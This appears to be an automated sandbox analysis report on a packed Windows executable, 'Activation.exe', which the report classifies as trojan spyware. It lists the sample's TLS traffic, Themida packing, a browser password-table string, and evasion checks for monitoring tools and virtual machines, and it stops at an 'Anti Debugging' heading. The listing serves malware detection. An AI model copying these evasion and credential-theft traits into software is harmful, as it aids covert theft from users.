            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.9:49739 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2

            System Summary

            Source: Activation.exe Static PE information: section name:
            Source: Activation.exe Static PE information: section name:
            Source: Activation.exe Static PE information: section name:
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C940E8
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C9D8F0
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C93818
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C9A440
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C9D8E0
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C934D0
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_05ABEF08
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_05ABEF18
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_05AB9837
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_05AB9848
            Source: C:\Users\user\Desktop\Activation.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432
            Source: Activation.exe Binary or memory string: OriginalFilename vs Activation.exe
            Source: Activation.exe, 00000000.00000000.1355318608.0000000000D06000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameqbittorrent.exe8 vs Activation.exe
            Source: Activation.exe, 00000000.00000002.1650676845.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameqbittorrent.exe8 vs Activation.exe
            Source: Activation.exe, 00000000.00000002.1645685696.00000000009FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Activation.exe
            Source: Activation.exe Binary or memory string: OriginalFilenameqbittorrent.exe8 vs Activation.exe
            Source: Activation.exe Static PE information: Section: ZLIB complexity 1.0004525674499565
            Source: Activation.exe Static PE information: Section: ZLIB complexity 1.0165413533834586
            Source: Activation.exe Static PE information: Section: ZLIB complexity 1.6
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@2/2
            Source: C:\Users\user\Desktop\Activation.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\Activation.exe Mutant created: \Sessions\1\BaseNamedObjects\Pekorojasecopycemonuxazivopenos
            Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
            Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\eb768719-ba71-4f34-a6c9-73e42f7258ae
            Source: C:\Users\user\Desktop\Activation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Activation.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003704000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Activation.exe ReversingLabs: Detection: 42%
            Source: unknown Process created: C:\Users\user\Desktop\Activation.exe "C:\Users\user\Desktop\Activation.exe"
            Source: C:\Users\user\Desktop\Activation.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Activation.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Activation.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Activation.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Activation.exe Static file information: File size 3361979 > 1048576
            Source: Activation.exe Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x3258bb
            Source: Binary string: System.Xml.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: HPHo,C:\Windows\System.pdb source: Activation.exe, 00000000.00000002.1645404055.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Configuration.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdb source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbL0Tw# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbTV source: Activation.exe, 00000000.00000002.1645685696.0000000000A85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb\ source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb;( source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Activation.exe, 00000000.00000002.1650751818.0000000000D08000.00000040.00000001.01000000.00000003.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdbh source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr

            Data Obfuscation

            Source: C:\Users\user\Desktop\Activation.exe Unpacked PE file: 0.2.Activation.exe.ce0000.0.unpack :ER; :R; :R;.imports:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R;
            Source: initial sample Static PE information: section where entry point is pointing to: .boot
            Source: Activation.exe Static PE information: section name:
            Source: Activation.exe Static PE information: section name:
            Source: Activation.exe Static PE information: section name:
            Source: Activation.exe Static PE information: section name: .imports
            Source: Activation.exe Static PE information: section name: .themida
            Source: Activation.exe Static PE information: section name: .boot
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C909D8 push cs; retf 0_2_00C909DA
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C909D0 push cs; retf 0_2_00C909D2
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C95178 push eax; mov dword ptr [esp], ecx 0_2_00C9518C
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C90AA8 push cs; retf 0_2_00C90AAA
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C90A08 push cs; retf 0_2_00C90AA2
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C90A00 push cs; retf 0_2_00C90A02
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C9BA21 pushfd ; retf 0_2_00C9BA22
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92A39 push ds; retf 0_2_00C92A3A
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92BF8 push ds; retf 0_2_00C92BFA
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92BF5 push ds; retf 0_2_00C92BF6
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92B21 push ds; retf 0_2_00C92B22
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C94C50 pushad ; retf 0_2_00C94C51
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92D2D push ds; retf 0_2_00C92D2E
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92D31 push ds; retf 0_2_00C92D32
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92E84 push ds; retf 0_2_00C92E86
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92E87 push ds; retf 0_2_00C92E8A
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92FBD push ds; retf 0_2_00C92FBE
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_00C92FBF push ds; retf 0_2_00C92FC2
            Source: C:\Users\user\Desktop\Activation.exe Code function: 0_2_05AB6EA3 pushad ; ret 0_2_05AB6EA9
            Source: Activation.exe Static PE information: section name: entropy: 7.9859308748687345

            Boot Survival

            Source: C:\Users\user\Desktop\Activation.exe Window searched: window name: RegmonClass
            Source: C:\Users\user\Desktop\Activation.exe Window searched: window name: FilemonClass
            Source: C:\Users\user\Desktop\Activation.exe Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\Activation.exe Window searched: window name: Regmonclass
            Source: C:\Users\user\Desktop\Activation.exe Window searched: window name: Filemonclass
            Source: C:\Users\user\Desktop\Activation.exe Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\Activation.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Activation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Source: C:\Users\user\Desktop\Activation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Activation.exe System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\Activation.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
            Source: C:\Users\user\Desktop\Activation.exe Memory allocated: C90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Activation.exe Memory allocated: 3470000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Activation.exe Memory allocated: 32C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Activation.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\Activation.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\Activation.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599891
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599766
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599656
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599547
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599437
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599328
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599216
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599109
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 599000
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598890
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598781
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598671
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598562
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598453
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598344
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598233
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 598102
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597991
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597835
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597728
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597624
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597513
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597406
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597296
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597187
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 597078
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 596969
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 596859
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 596750
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 596640
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 596530
            Source: C:\Users\user\Desktop\Activation.exe Thread delayed: delay time: 596395
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 586599Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow / User API: threadDelayed 4525Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow / User API: threadDelayed 2245Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599216s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598233s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598102s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597991s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597835s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597728s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597513s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596530s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596395s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -586599s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Activation.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599216Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598233Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598102Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597991Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597835Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597728Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597513Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596530Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596395Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 586599Jump to behavior
            Source: Amcache.hve.5.drBinary or memory string: VMware
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
            Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Activation.exe, 00000000.00000002.1645685696.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
            Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\Activation.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

